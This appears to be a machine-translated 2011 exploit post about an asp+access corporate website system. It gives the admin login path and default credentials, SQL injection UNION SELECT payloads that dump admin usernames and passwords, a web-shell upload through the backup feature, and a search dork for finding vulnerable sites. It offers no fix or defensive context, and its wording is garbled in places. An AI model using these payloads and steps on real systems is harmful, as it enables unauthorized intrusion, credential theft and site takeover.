Lucene search

HistoryJul 29, 2011 - 12:00 a.m.

Houben figure enterprise website system cookies injection-vulnerability warning-the black bar safety net


Based on asp+access corporate website source code, database has been provided with an anti-download the site more secure. To modify a site, custom your own to the page, and landscaping page is your own complete, website source code program is complete, the background powerful.

Source code download:

Program complete log back:/admin/login. asp

The default landing account:admin password:admin888

Statement: (preceded by a space)

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin

Or is 1 6 fields:

and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6 from admin

Burst out yourself to guess the field.

Injection point:

getshell:background there is a backup, upload pictures of ponies. Backup name:. asp access


inurl:shownews? asp. id=